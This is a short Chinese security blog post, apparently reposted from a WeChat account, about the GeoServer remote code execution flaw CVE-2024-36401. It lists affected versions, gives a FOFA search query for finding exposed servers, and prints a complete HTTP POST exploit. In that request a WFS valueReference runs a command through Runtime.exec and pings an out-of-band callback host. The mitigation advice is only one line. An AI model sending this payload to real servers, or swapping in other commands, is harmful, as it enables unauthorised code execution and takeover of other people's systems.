GeoServer
<
2
.
23
.
6
2
.
24
.
0
<= GeoServer <
2
.
24
.
4
2
.
25
.
0
<= GeoServer <
2
.
25
.
2
搜索语法
FOFA:
app
=
"GeoServer"
页面是这个酱紫
EXP如下:
POST
/geoserver/wfs
HTTP/1.1
Host
: 127.0.0.1:808
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15
Connection
: close
Content-Length
: 362
Content-Type
: application/xml
Accept-Encoding
: gzip, deflate, br
<
wfs:GetPropertyValue
service
=
'WFS'
version
=
'2.0.0'
xmlns:topp
=
'http://www.openplans.org/topp'
xmlns:fes
=
'http://www.opengis.net/fes/2.0'
xmlns:wfs
=
'http://www.opengis.net/wfs/2.0'
valueReference
=
'exec(java.lang.Runtime.getRuntime(),"ping frmjwegublhzilnkgwcfb5fbn9y1ofb8c.oast.fun -c 2")'
>
<
wfs:Query
typeNames
=
'topp:states'
/>
</
wfs:GetPropertyValue
>
Success~
官方已发布安全补丁,建议联系厂商打补丁或升级版本。
引入Web应用防火墙防护,配置接口拦截策略。
原文始发于微信公众号(哪都通安全):叮~你有新的速递!CVE-2024-36401 RCE漏洞(附EXP)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论